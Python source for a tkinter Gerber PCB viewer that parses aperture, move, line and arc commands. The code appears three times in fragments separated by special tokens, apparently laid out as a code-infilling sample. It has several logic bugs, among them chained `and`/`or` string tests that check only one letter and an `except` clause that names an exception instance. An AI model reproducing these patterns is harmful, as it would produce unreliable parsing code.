x1) + GerberCanvas.units_string[GerberCanvas.units],
str(y1) + GerberCanvas.units_string[GerberCanvas.
units], outline='white', fill='black')
if 'C,' in self.AD_commands[self.current_ad_command]:
print('draw a circle')
if 'D02' in item:
self.__get_numbers(item)
if 'X' in item and 'Y' not in item:
self.start_x = self.x
if 'Y' in item and 'X' not in item:
self.start_y = self.y
if 'X' in item and 'Y' in item:
self.start_x = self.x
self.start_y = self.y
if 'D01' in item and ('I' not in item and 'J' not in item):
if self.file_gto:
self.__get_numbers(item)
if DEBUG:
print(self.start_x, ',', self.start_y, ',', self.x,
',', self.y)
self.my_canvas.create_line(self.start_x + 'i', self.
start_y + 'i', self.x + 'i', self.y + 'i', width=
self.current_aperture + 'i')
self.start_x = self.x
self.start_y = self.y
if 'D01' and 'I' and 'J' in item:
if self.file_gto:
self.start_x = self.x
self.start_y = self.y
self.__get_numbers(item)
if self.quadrant_mode:
if self.start_x == self.x and self.start_y == self.y:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if self.i != 0:
radius = float(self.i)
elif self.j != 0:
radius = float(self.j)
try:
self.my_canvas.create_oval(str(cp_x -
radius) + GerberCanvas.units_string[
GerberCanvas.units], str(cp_y - radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_x + radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_y + radius) +
GerberCanvas.units_string[GerberCanvas.
units], outline='black', width=self.
current_aperture)
except UnboundLocalError():
messagebox.showwarning('Warning',
'Something went wrong.')
break
else:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if DEBUG:
print(str(cp_x) + ' ' + str(cp_y))
if float(self.i) > 0:
radius = float(self.i)
elif float(self.j) > 0:
radius = float(self.j)
else:
radius = 0.0
self.__set_direction()
start_angle = math.degrees(math.atan2(float(
self.start_y) - cp_y, float(self.start_x) -
cp_x))
end_angle = math.degrees(math.atan2(float(self.
y) - cp_y, float(self.x) - cp_x))
try:
self.my_canvas.create_arc(str(cp_x + radius
) + GerberCanvas.units_string[
GerberCanvas.units], str(cp_y + radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_x - radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_y - radius) +
GerberCanvas.units_string[GerberCanvas.
units], style=tk.ARC, width=self.
current_aperture, start=start_angle,
extent=end_angle - start_angle, outline
='black')
except UnboundLocalError():
messagebox.showwarning('Warning',
'Something went wrong.')
@staticmethod
def __get_circle_diameter(value):
return value[3:len(value)]
@staticmethod
def __get_rectangle_size(value):
print(value)
find_x = value.find('X'[0:len(value)])
width = value[2:find_x]
length = value[find_x + 1:len(value)]
print(width, length)
return width, length
def __get_extent(self, radius):
distance = self.__distance(float(self.start_x), float(self.start_y),
float(self.x), float(self.y))
if DEBUG:
print('distance = ', distance)
number = 1 - distance ** 2 / (2 * radius ** 2)
result = number - int(number)
return math.acos(result)
@staticmethod
def __distance(start_x, start_y, end_x, end_y):
"""calculate distance between two points
:param start_x
:param start_y
:param end_x
:param end_y
"""
distance = math.sqrt((start_x - end_x) ** 2 + (start_y - end_y) ** 2)
return distance
def __set_direction(self):
if self.x == self.start_x:
if self.y < self.start_y:
self.direction = 90
else:
self.direction = 270
if self.y == self.start_y:
if self.x < self.start_x:
self.direction = 0
else:
self.direction = 180
def __get_numbers(self, item):
found = 0
if 'I' in item and 'J' in item and found == 0:
found = 1
i_start = item.find('I')
j_start = item.find('J')
d_start = item.find('D')
i_temp = item[i_start + 1:j_start]
j_temp = item[j_start + 1:d_start]
j_temp = str(int(j_temp) * -1)
self.i = self.__format_number(i_temp)
self.j = self.__format_number(j_temp)
if 'X' and 'Y' in item:
found = 0
if 'X' in item and 'Y' in item and found == 0:
found = 1
x_start = item.find('X')
y_start = item.find('Y')
d_start = item.find('D')
x_temp = item[x_start + 1:y_start]
y_temp = item[y_start + 1:d_start]
if ('I' or 'J') in y_temp:
for i in range(1, len(y_temp)):
if y_temp[i] == 'I':
y_temp = y_temp[0:i]
break
y_temp = str(int(y_temp) * -1)
self.x = self.__format_number(x_temp)
self.y = self.__format_number(y_temp)
if 'X' in item and found == 0:
found = 1
x_start = item.find('X')
d_start = item.find('D')
x_temp = item[x_start + 1:d_start]
self.x = self.__format_number(x_temp)
if 'Y' in item and found == 0:
found = 1
y_start = item.find('Y')
d_start = item.find('D')
y_temp = item[y_start + 1:d_start]
y_temp = str(int(y_temp) * -1)
self.y = self.__format_number(y_temp)
def __format_number(self, number):
how_long = len(number)
if how_long <= int(self.x_format[1]):
if '-' in number:
temp = number[1:len(number)]
return '-.' + temp.zfill(int(self.x_format[1]))
else:
return '.' + number.zfill(int(self.x_format[1]))
elif how_long > int(self.x_format[1]):
last = number[-5:len(number)]
first = number[0:len(number) - 5]
if '-' in number:
return first + '.' + last
else:
return first + '.' + last
def high_lite_part(self, x, y, layer):
x1 = self.__format_pnp(x)
y1 = self.__format_pnp(y) * -1
last_x = float(x1) + 0.1
last_y = float(y1) + 0.1
if layer == 'TopLayer':
color = 'red'
else:
color = 'blue'
self.__part_selected = self.my_canvas.create_oval(str(x1) + 'i',
str(y1) + 'i', str(last_x) + 'i', str(last_y) + 'i', outline=
color, fill=color)
def delete_current_highlight(self):
if self.__part_selected:
self.my_canvas.delete(self.__part_selected)
def __scale_image_up(self, event=None):
self.scale_factor = 1
self.scale_factor += 0.1
self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)
PickPlace.adjust_pic_n_place(self.scale_factor)
self.scaled = True
def __scale_image_down(self, event=None):
self.scale_factor = 1
self.scale_factor -= 0.1
self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)
if PickPlace.is_file_loaded:
PickPlace.adjust_pic_n_place(self.scale_factor)
self.scaled = True
def __scale_image(self, event=None):
if event.delta >= 120:
self.__scale_image_up()
elif event.delta <= -120:
self.__scale_image_down()
self.scaled = True
@staticmethod
def __format_pnp(number):
move1 = float(number) / 10
move2 = move1 / 10
final = move2 / 10
return final
def __parse_file_gtp(self):
temp_list = self.file_commands
for item in temp_list:
if '%FSLA' in item:
self.x_format = item[6:8]
self.y_format = item[9:11]
if '%MO' in item:
self.units = item[3:5]
if 'IN' in item:
self.__inch = 1
self.__mm = 0
if 'MM' in item:
self.__inch = 0
self.__mm = 1
if 'G01' in item:
self.graphics_mode = 1
if 'G03' in item:
self.direction = 270
if 'G02' in item:
self.direction = 90
if 'G74' in item:
self.quadrant_mode = 0
if 'G75' in item:
self.quadrant_mode = 1
if '%AD' in item:
name = item[3:item.find(',') - 1]
start = item.find(',')
stop = item.find('*', start)
value = item[start - 1:stop]
self.AD_commands[name] = value[2:len(value)]
if item[0:1] == 'D':
item = item[0:item.find('*')]
for key, value in self.AD_commands.items():
if item in key:
self.current_aperture = value
if 'D02' in item:
self.__get_numbers(item)
if 'X' in item and 'Y' not in item:
self.start_x = self.x
if 'Y' in item and 'X' not in item:
self.start_y = self.y
if 'X' in item and 'Y' in item:
self.start_x = self.x
self.start_y = self.y
if 'D01' in item and ('I' not in item and 'J' not in item):
self.__get_numbers(item)
self.my_canvas.create_line(self.start_x + 'i', self.start_y +
'i', self.x + 'i', self.y + 'i', width=self.
current_aperture + 'i')
self.start_x = self.x
self.start_y = self.y
if 'D01' and 'I' and 'J' in item:
self.start_x = self.x
self.start_y = self.y
self.__get_numbers(item)
if self.quadrant_mode:
if self.start_x == self.x and self.start_y == self.y:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if self.i != 0:
radius = float(self.i)
elif self.j != 0:
radius = float(self.j)
self.my_canvas.create_oval(str(cp_x - radius) + 'i',
str(cp_y - radius) + 'i', str(cp_x + radius) +
'i', str(cp_y + radius) + 'i', outline='black',
width=self.current_aperture)
else:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if float(self.i) > 0:
radius = float(self.i)
elif float(self.j) > 0:
radius = float(self.j)
self.__set_direction()
start_angle = math.degrees(math.atan2(float(self.
start_y) - cp_y, float(self.start_x) - cp_x))
end_angle = math.degrees(math.atan2(float(self.y) -
cp_y, float(self.x) - cp_x))
ext = math.degrees(self.__get_extent(radius))
self.my_canvas.create_arc(str(cp_x + radius) + 'i',
str(cp_y + radius) + 'i', str(cp_x - radius) +
'i', str(cp_y - radius) + 'i', style=tk.ARC,
width=self.current_aperture, start=start_angle,
extent=end_angle - start_angle, outline='black')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
DEBUG = False
class GerberCanvas:
file_gto = False
file_gtp = False
units = 0
units_string = 'i', 'm'
"""
my canvas
"""
def __init__(self, frame):
self.x_format = ''
self.y_format = ''
self.units = ''
self.quadrant_mode = 0
self.file_commands = ''
self.file_gtp_commands = ''
self.gerber_file_name = ''
self.AD_commands = {}
self.current_aperture = ''
self.x = '0'
self.y = '0'
self.i = '0'
self.j = '0'
self.last_x = ''
self.last_y = ''
self.start_x = ''
self.start_y = ''
self.direction = 0
self.graphics_mode = 0
self.scaled = False
self.bounding_box_size = ()
self._canvas_frame = frame
self.create_canvas()
def create_canvas(self):
self.my_canvas = tk.Canvas(self._canvas_frame, bg='white', bd='1')
self.my_canvas.pack(expand=True, fill='both')
if sys.platform == 'linux':
self.my_canvas.bind('<Button-4>', self.__scale_image_up)
self.my_canvas.bind('<Button-5>', self.__scale_image_down)
else:
self.my_canvas.bind('<MouseWheel>', self.__scale_image)
self.y_scrollbar = tk.Scrollbar(self.my_canvas, command=self.
my_canvas.yview)
self.y_scrollbar.pack(expand=True, fill='y', anchor='e')
self.x_scrollbar = tk.Scrollbar(self.my_canvas, orient=tk.
HORIZONTAL, command=self.my_canvas.xview)
self.x_scrollbar.pack(fill='x', anchor='s')
if sys.platform == 'linux':
self.my_canvas.configure(xscrollcommand=self.x_scrollbar.set,
yscrollcommand=self.y_scrollbar.set)
self.__part_selected = 0
def load_gerber(self, path, file):
"""load gerber file
:param path: path to the file
:param file: file name to use
"""
try:
all_ids = self.my_canvas.find_all()
if all_ids:
try:
for item in all_ids:
print(item)
self.my_canvas.delete(item)
except tk.TclError:
messagebox.showerror('Error', tk.TclError)
if path:
self.file_gto = True
try:
with open(os.path.join(path, file), 'r') as gerber_file:
self.file_commands = gerber_file.read().splitlines()
except TypeError:
messagebox.showerror('Type Error', 'Invalid File Type')
self.__parse_file(self.file_commands)
self.my_canvas.create_oval('0i', '0i', '.1i', '.1i', outline='red')
self.gerber_file_name = file
self.scaled = False
if DEBUG:
print('Scroll region is : ', self.bounding_box_size)
except IOError:
messagebox.showerror('File Error', 'File did not open, GTO')
finally:
self.file_gto = False
self.load_gerber_gtp(os.path.join(path, file))
self.my_canvas.config(scrollregion=self.my_canvas.bbox('all'))
def load_gerber_gtp(self, file_path):
self.file_gtp = True
try:
print(file_path)
new_file = 'c' + file_path[1:len(file_path) - 3] + 'GTP'
print('final name =', new_file)
if file_path:
try:
with open(new_file, 'r') as gerber_file:
self.file_gtp_commands = gerber_file.read().splitlines(
)
except TypeError:
messagebox.showerror('Type Error', 'Invalid File Type')
self.__parse_file(self.file_gtp_commands)
except IOError:
messagebox.showerror('File Error', 'File did not open, GTP')
def __parse_file(self, commands):
if DEBUG:
print(self.file_commands)
temp_list = commands
for item in temp_list:
if DEBUG:
print(item)
if '%FSLA' in item:
self.x_format = item[6:8]
self.y_format = item[9:11]
if '%MO' in item:
self.units = item[3:5]
if 'IN' in item:
GerberCanvas.units = 0
if 'MM' in item:
GerberCanvas.units = 1
if 'G01' in item:
self.graphics_mode = 1
if 'G03' in item:
self.direction = 270
if 'G02' in item:
self.direction = 90
if 'G74' in item:
self.quadrant_mode = 0
if 'G75' in item:
self.quadrant_mode = 1
if '%AD' in item:
name = item[3:item.find(',') - 1]
if DEBUG:
print(name)
start = item.find(',')
stop = item.find('*', start)
value = item[start - 1:stop]
if DEBUG:
print(value)
self.AD_commands[name] = value
if item[0:1] == 'D':
item = item[0:item.find('*')]
if DEBUG:
print('I found a ', item)
for key, value in self.AD_commands.items():
self.current_ad_command = key
if item in key:
if 'R,' in value:
print(value)
x, y = self.__get_rectangle_size(value)
self.rect_x = x
self.rect_y = y
print('Half of x is: ', float(self.rect_x) / 2)
elif 'C,' in value:
print(value)
self.current_aperture = self.__get_circle_diameter(
value)
elif 'O,' in value:
pass
elif 'P,' in value:
pass
elif 'TARGET' in value:
pass
elif 'THERMAL' in value:
pass
if 'D03' in item:
if DEBUG:
print('current key is = ', self.current_ad_command)
print(self.AD_commands[self.current_ad_command])
if 'R,' in self.AD_commands[self.current_ad_command]:
if DEBUG:
print('draw a rectangle')
x0 = float(self.start_x) - float(self.rect_x) / 2
y0 = float(self.start_y) + float(self.rect_y) / 2
x1 = float(self.start_x) + float(self.rect_x) / 2
y1 = float(self.start_y) - float(self.rect_y) / 2
self.my_canvas.create_rectangle(str(x0) + GerberCanvas.
units_string[GerberCanvas.units], str(y0) +
GerberCanvas.units_string[GerberCanvas.units], str(
x1) + GerberCanvas.units_string[GerberCanvas.units],
str(y1) + GerberCanvas.units_string[GerberCanvas.
units], outline='white', fill='black')
if 'C,' in self.AD_commands[self.current_ad_command]:
print('draw a circle')
if 'D02' in item:
self.__get_numbers(item)
if 'X' in item and 'Y' not in item:
self.start_x = self.x
if 'Y' in item and 'X' not in item:
self.start_y = self.y
if 'X' in item and 'Y' in item:
self.start_x = self.x
self.start_y = self.y
if 'D01' in item and ('I' not in item and 'J' not in item):
if self.file_gto:
self.__get_numbers(item)
if DEBUG:
print(self.start_x, ',', self.start_y, ',', self.x,
',', self.y)
self.my_canvas.create_line(self.start_x + 'i', self.
start_y + 'i', self.x + 'i', self.y + 'i', width=
self.current_aperture + 'i')
self.start_x = self.x
self.start_y = self.y
if 'D01' and 'I' and 'J' in item:
if self.file_gto:
self.start_x = self.x
self.start_y = self.y
self.__get_numbers(item)
if self.quadrant_mode:
if self.start_x == self.x and self.start_y == self.y:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if self.i != 0:
radius = float(self.i)
elif self.j != 0:
radius = float(self.j)
try:
self.my_canvas.create_oval(str(cp_x -
radius) + GerberCanvas.units_string[
GerberCanvas.units], str(cp_y - radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_x + radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_y + radius) +
GerberCanvas.units_string[GerberCanvas.
units], outline='black', width=self.
current_aperture)
except UnboundLocalError():
messagebox.showwarning('Warning',
'Something went wrong.')
break
else:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if DEBUG:
print(str(cp_x) + ' ' + str(cp_y))
if float(self.i) > 0:
radius = float(self.i)
elif float(self.j) > 0:
radius = float(self.j)
else:
radius = 0.0
self.__set_direction()
start_angle = math.degrees(math.atan2(float(
self.start_y) - cp_y, float(self.start_x) -
cp_x))
end_angle = math.degrees(math.atan2(float(self.
y) - cp_y, float(self.x) - cp_x))
try:
self.my_canvas.create_arc(str(cp_x + radius
) + GerberCanvas.units_string[
GerberCanvas.units], str(cp_y + radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_x - radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_y - radius) +
GerberCanvas.units_string[GerberCanvas.
units], style=tk.ARC, width=self.
current_aperture, start=start_angle,
extent=end_angle - start_angle, outline
='black')
except UnboundLocalError():
messagebox.showwarning('Warning',
'Something went wrong.')
@staticmethod
def __get_circle_diameter(value):
return value[3:len(value)]
@staticmethod
def __get_rectangle_size(value):
print(value)
find_x = value.find('X'[0:len(value)])
width = value[2:find_x]
length = value[find_x + 1:len(value)]
print(width, length)
return width, length
def __get_extent(self, radius):
distance = self.__distance(float(self.start_x), float(self.start_y),
float(self.x), float(self.y))
if DEBUG:
print('distance = ', distance)
number = 1 - distance ** 2 / (2 * radius ** 2)
result = number - int(number)
return math.acos(result)
@staticmethod
def __distance(start_x, start_y, end_x, end_y):
"""calculate distance between two points
:param start_x
:param start_y
:param end_x
:param end_y
"""
distance = math.sqrt((start_x - end_x) ** 2 + (start_y - end_y) ** 2)
return distance
def __set_direction(self):
if self.x == self.start_x:
if self.y < self.start_y:
self.direction = 90
else:
self.direction = 270
if self.y == self.start_y:
if self.x < self.start_x:
self.direction = 0
else:
self.direction = 180
def __get_numbers(self, item):
found = 0
if 'I' in item and 'J' in item and found == 0:
found = 1
i_start = item.find('I')
j_start = item.find('J')
d_start = item.find('D')
i_temp = item[i_start + 1:j_start]
j_temp = item[j_start + 1:d_start]
j_temp = str(int(j_temp) * -1)
self.i = self.__format_number(i_temp)
self.j = self.__format_number(j_temp)
if 'X' and 'Y' in item:
found = 0
if 'X' in item and 'Y' in item and found == 0:
found = 1
x_start = item.find('X')
y_start = item.find('Y')
d_start = item.find('D')
x_temp = item[x_start + 1:y_start]
y_temp = item[y_start + 1:d_start]
if ('I' or 'J') in y_temp:
for i in range(1, len(y_temp)):
if y_temp[i] == 'I':
y_temp = y_temp[0:i]
break
y_temp = str(int(y_temp) * -1)
self.x = self.__format_number(x_temp)
self.y = self.__format_number(y_temp)
if 'X' in item and found == 0:
found = 1
x_start = item.find('X')
d_start = item.find('D')
x_temp = item[x_start + 1:d_start]
self.x = self.__format_number(x_temp)
if 'Y' in item and found == 0:
found = 1
y_start = item.find('Y')
d_start = item.find('D')
y_temp = item[y_start + 1:d_start]
y_temp = str(int(y_temp) * -1)
self.y = self.__format_number(y_temp)
def __format_number(self, number):
how_long = len(number)
if how_long <= int(self.x_format[1]):
if '-' in number:
temp = number[1:len(number)]
return '-.' + temp.zfill(int(self.x_format[1]))
else:
return '.' + number.zfill(int(self.x_format[1]))
elif how_long > int(self.x_format[1]):
last = number[-5:len(number)]
first = number[0:len(number) - 5]
if '-' in number:
return first + '.' + last
else:
return first + '.' + last
def high_lite_part(self, x, y, layer):
x1 = self.__format_pnp(x)
y1 = self.__format_pnp(y) * -1
last_x = float(x1) + 0.1
last_y = float(y1) + 0.1
if layer == 'TopLayer':
color = 'red'
else:
color = 'blue'
self.__part_selected = self.my_canvas.create_oval(str(x1) + 'i',
str(y1) + 'i', str(last_x) + 'i', str(last_y) + 'i', outline=
color, fill=color)
def delete_current_highlight(self):
if self.__part_selected:
self.my_canvas.delete(self.__part_selected)
def __scale_image_up(self, event=None):
self.scale_factor = 1
self.scale_factor += 0.1
self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)
PickPlace.adjust_pic_n_place(self.scale_factor)
self.scaled = True
def __scale_image_down(self, event=None):
self.scale_factor = 1
self.scale_factor -= 0.1
self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)
if PickPlace.is_file_loaded:
PickPlace.adjust_pic_n_place(self.scale_factor)
self.scaled = True
def __scale_image(self, event=None):
if event.delta >= 120:
self.__scale_image_up()
elif event.delta <= -120:
self.__scale_image_down()
self.scaled = True
@staticmethod
def __format_pnp(number):
move1 = float(number) / 10
move2 = move1 / 10
final = move2 / 10
return final
def __parse_file_gtp(self):
temp_list = self.file_commands
for item in temp_list:
if '%FSLA' in item:
self.x_format = item[6:8]
self.y_format = item[9:11]
if '%MO' in item:
self.units = item[3:5]
if 'IN' in item:
self.__inch = 1
self.__mm = 0
if 'MM' in item:
self.__inch = 0
self.__mm = 1
if 'G01' in item:
self.graphics_mode = 1
if 'G03' in item:
self.direction = 270
if 'G02' in item:
self.direction = 90
if 'G74' in item:
self.quadrant_mode = 0
if 'G75' in item:
self.quadrant_mode = 1
if '%AD' in item:
name = item[3:item.find(',') - 1]
start = item.find(',')
stop = item.find('*', start)
value = item[start - 1:stop]
self.AD_commands[name] = value[2:len(value)]
if item[0:1] == 'D':
item = item[0:item.find('*')]
for key, value in self.AD_commands.items():
if item in key:
self.current_aperture = value
if 'D02' in item:
self.__get_numbers(item)
if 'X' in item and 'Y' not in item:
self.start_x = self.x
if 'Y' in item and 'X' not in item:
self.start_y = self.y
if 'X' in item and 'Y' in item:
self.start_x = self.x
self.start_y = self.y
if 'D01' in item and ('I' not in item and 'J' not in item):
self.__get_numbers(item)
self.my_canvas.create_line(self.start_x + 'i', self.start_y +
'i', self.x + 'i', self.y + 'i', width=self.
current_aperture + 'i')
self.start_x = self.x
self.start_y = self.y
if 'D01' and 'I' and 'J' in item:
self.start_x = self.x
self.start_y = self.y
self.__get_numbers(item)
if self.quadrant_mode:
if self.start_x == self.x and self.start_y == self.y:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if self.i != 0:
radius = float(self.i)
elif self.j != 0:
radius = float(self.j)
self.my_canvas.create_oval(str(cp_x - radius) + 'i',
str(cp_y - radius) + 'i', str(cp_x + radius) +
'i', str(cp_y + radius) + 'i', outline='black',
width=self.current_aperture)
else:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if float(self.i) > 0:
radius = float(self.i)
elif float(self.j) > 0:
radius = float(self.j)
self.__set_direction()
start_angle = math.degrees(math.atan2(float(self.
start_y) - cp_y, float(self.start_x) - cp_x))
end_angle = math.degrees(math.atan2(float(self.y) -
cp_y, float(self.x) - cp_x))
ext = math.degrees(self.__get_extent(radius))
self.my_canvas.create_arc(str(cp_x + radius) + 'i',
str(cp_y + radius) + 'i', str(cp_x - radius) +
'i', str(cp_y - radius) + 'i', style=tk.ARC,
width=self.current_aperture, start=start_angle,
extent=end_angle - start_angle, outline='black')
<|reserved_special_token_1|>
import tkinter as tk
from pickplace import PickPlace
import sys
import math
from tkinter import messagebox
import os
DEBUG = False
class GerberCanvas:
file_gto = False
file_gtp = False
units = 0
units_string = ('i', 'm')
"""
my canvas
"""
def __init__(self, frame):
self.x_format = ''
self.y_format = ''
self.units = ''
self.quadrant_mode = 0
self.file_commands = ''
self.file_gtp_commands = ''
self.gerber_file_name = ''
self.AD_commands = {} # dict to hold aperture commands
self.current_aperture = ''
self.x = '0'
self.y = '0'
self.i = '0'
self.j = '0'
self.last_x = ''
self.last_y = ''
self.start_x = ''
self.start_y = ''
self.direction = 0
self.graphics_mode = 0
self.scaled = False
self.bounding_box_size = ()
self._canvas_frame = frame
self.create_canvas()
def create_canvas(self):
self.my_canvas = tk.Canvas(self._canvas_frame, bg='white', bd='1')
self.my_canvas.pack(expand=True, fill='both')
if sys.platform == 'linux':
self.my_canvas.bind('<Button-4>', self.__scale_image_up)
self.my_canvas.bind('<Button-5>', self.__scale_image_down)
else:
self.my_canvas.bind('<MouseWheel>', self.__scale_image)
# fixme fix the scrollbars so that they work correctly
self.y_scrollbar = tk.Scrollbar(self.my_canvas, command=self.my_canvas.yview)
self.y_scrollbar.pack(expand=True, fill='y', anchor='e')
self.x_scrollbar = tk.Scrollbar(self.my_canvas, orient=tk.HORIZONTAL, command=self.my_canvas.xview)
self.x_scrollbar.pack(fill='x', anchor='s')
# Set this only if using in Linux
if sys.platform == 'linux':
self.my_canvas.configure(xscrollcommand=self.x_scrollbar.set, yscrollcommand=self.y_scrollbar.set)
self.__part_selected = 0
def load_gerber(self, path, file):
"""load gerber file
:param path: path to the file
:param file: file name to use
"""
try:
# file_path = askopenfilename(title='Open Top Silk Screen File', filetypes=[('GTO files', '*.GTO')],
# initialdir='')
all_ids = self.my_canvas.find_all()
# delete the current image if one exist.
if all_ids:
try:
for item in all_ids:
print(item)
self.my_canvas.delete(item)
except tk.TclError:
messagebox.showerror('Error', tk.TclError)
if path:
self.file_gto = True
try:
with open(os.path.join(path, file), 'r') as gerber_file:
self.file_commands = gerber_file.read().splitlines()
except TypeError:
messagebox.showerror('Type Error', 'Invalid File Type')
# self._parse_file(gerber_file.read())
self.__parse_file(self.file_commands)
self.my_canvas.create_oval('0i', '0i', '.1i', '.1i', outline='red')
self.gerber_file_name = file
self.scaled = False
# self.bounding_box_size = self.my_canvas.bbox('all')
if DEBUG:
print('Scroll region is : ', self.bounding_box_size)
except IOError:
messagebox.showerror('File Error', 'File did not open, GTO')
finally:
self.file_gto = False
# load top pads into image
self.load_gerber_gtp(os.path.join(path, file))
self.my_canvas.config(scrollregion=self.my_canvas.bbox('all'))
# self.my_canvas.configure(xscrollcommand=self.x_scrollbar.set, yscrollcommand=self.y_scrollbar.set)
def load_gerber_gtp(self, file_path):
self.file_gtp = True
try:
print(file_path)
new_file = 'c' + file_path[1:len(file_path)-3]+'GTP'
print('final name =', new_file)
if file_path:
try:
with open(new_file, 'r') as gerber_file:
self.file_gtp_commands = gerber_file.read().splitlines()
except TypeError:
messagebox.showerror('Type Error', 'Invalid File Type')
self.__parse_file(self.file_gtp_commands)
# self.scaled = False
except IOError:
messagebox.showerror('File Error', 'File did not open, GTP')
def __parse_file(self, commands):
if DEBUG:
print(self.file_commands)
temp_list = commands
for item in temp_list:
if DEBUG:
print(item)
if '%FSLA' in item:
self.x_format = item[6:8]
self.y_format = item[9:11]
if '%MO' in item:
self.units = item[3:5]
if 'IN' in item:
GerberCanvas.units = 0
if 'MM' in item:
GerberCanvas.units = 1
# print('units is ', self.units)
if 'G01' in item:
self.graphics_mode = 1 # sets Interpolation mode graphics state parameter to linear
if 'G03' in item:
self.direction = 270 # CounterClockWise
if 'G02' in item:
self.direction = 90 # ClockWise
if 'G74' in item:
self.quadrant_mode = 0 # single Quadrant mode
if 'G75' in item:
self.quadrant_mode = 1 # Multi quadrant mode
if '%AD' in item: # define the aperture
name = item[3:item.find(',')-1]
if DEBUG:
print(name)
start = item.find(',')
stop = item.find('*', start)
value = item[start-1:stop]
if DEBUG:
print(value)
self.AD_commands[name] = value
if item[0:1] == 'D': # set the current aperture
item = item[0:item.find('*')]
if DEBUG:
print('I found a ', item)
for key, value in self.AD_commands.items():
self.current_ad_command = key
if item in key:
if 'R,' in value: # for a rectangle
print(value)
x, y = self.__get_rectangle_size(value)
self.rect_x = x
self.rect_y = y
print('Half of x is: ', float(self.rect_x)/2)
# todo send this to a function to get size
elif 'C,' in value: # for a circle
print(value)
self.current_aperture = self.__get_circle_diameter(value)
elif 'O,' in value: # for a ob-round
pass
elif 'P,' in value: # for a polygon
pass
elif 'TARGET' in value:
pass
elif 'THERMAL' in value:
pass
# This is the Flash command. Create a flash of the object.
if 'D03' in item:
if DEBUG:
print('current key is = ', self.current_ad_command)
print(self.AD_commands[self.current_ad_command])
if 'R,' in self.AD_commands[self.current_ad_command]:
if DEBUG:
print('draw a rectangle')
x0 = float(self.start_x) - float(self.rect_x) / 2
y0 = float(self.start_y) + float(self.rect_y) / 2
x1 = float(self.start_x) + float(self.rect_x) / 2
y1 = float(self.start_y) - float(self.rect_y) / 2
self.my_canvas.create_rectangle(str(x0) + GerberCanvas.units_string[GerberCanvas.units],
str(y0) + GerberCanvas.units_string[GerberCanvas.units],
str(x1) + GerberCanvas.units_string[GerberCanvas.units],
str(y1) + GerberCanvas.units_string[GerberCanvas.units],
outline='white', fill='black')
if 'C,' in self.AD_commands[self.current_ad_command]:
print('draw a circle')
# the D02 command is the move to command.
if 'D02' in item:
self.__get_numbers(item)
if 'X' in item and 'Y' not in item:
self.start_x = self.x
if 'Y' in item and 'X' not in item:
self.start_y = self.y
if 'X' in item and 'Y' in item:
self.start_x = self.x
self.start_y = self.y
# if ('D01' in item) and (('I' not in item) and ('J' not in item)): # draw a line
if ('D01' in item) and (('I' not in item) and ('J' not in item)):
if self.file_gto: # draw a line
self.__get_numbers(item)
if DEBUG:
print(self.start_x, ',', self.start_y, ',', self.x, ',', self.y)
self.my_canvas.create_line(self.start_x+'i', self.start_y+'i', self.x+'i', self.y+'i',
width=self.current_aperture+'i')
self.start_x = self.x
self.start_y = self.y
# this Draws a circle.
if 'D01' and 'I' and 'J' in item: # draw a circle/arc
if self.file_gto:
self.start_x = self.x
self.start_y = self.y
self.__get_numbers(item) # test
if self.quadrant_mode: # This draws circles or arcs
if (self.start_x == self.x) and (self.start_y == self.y): # This draws circles
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if self.i != 0:
radius = float(self.i)
elif self.j != 0:
radius = float(self.j)
try:
self.my_canvas.create_oval(str(cp_x - radius) + GerberCanvas.units_string[GerberCanvas.units],
str(cp_y - radius) + GerberCanvas.units_string[GerberCanvas.units],
str(cp_x + radius) + GerberCanvas.units_string[GerberCanvas.units],
str(cp_y + radius) + GerberCanvas.units_string[GerberCanvas.units],
outline='black', width=self.current_aperture)
except UnboundLocalError():
messagebox.showwarning('Warning', 'Something went wrong.')
break
else: # This draws arcs
# self.evaluate_arc_command(item)
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if DEBUG:
print(str(cp_x) + ' ' + str(cp_y))
if float(self.i) > 0:
radius = float(self.i)
elif float(self.j) > 0:
radius = float(self.j)
else:
radius = 0.0
self.__set_direction()
start_angle = math.degrees(math.atan2(float(self.start_y) - cp_y, float(self.start_x) - cp_x))
end_angle = math.degrees(math.atan2(float(self.y) - cp_y, float(self.x) - cp_x))
# radius = math.degrees(self.__get_extent(radius))
try:
self.my_canvas.create_arc(str(cp_x + radius) + GerberCanvas.units_string[GerberCanvas.units],
str(cp_y + radius) + GerberCanvas.units_string[GerberCanvas.units],
str(cp_x - radius) + GerberCanvas.units_string[GerberCanvas.units],
str(cp_y - radius) + GerberCanvas.units_string[GerberCanvas.units],
style=tk.ARC, width=self.current_aperture, start=start_angle,
extent=end_angle-start_angle, outline='black')
# self.my_canvas.create_arc('0', '0', '100', '100', style='arc', start=90, extent=180,
# outline='purple')
except UnboundLocalError():
messagebox.showwarning('Warning', 'Something went wrong.')
@staticmethod
def __get_circle_diameter(value):
return value[3:len(value)]
@staticmethod
def __get_rectangle_size(value):
print(value)
find_x = value.find('X'[0:len(value)])
width = value[2:find_x]
length = value[find_x+1:len(value)]
print(width, length)
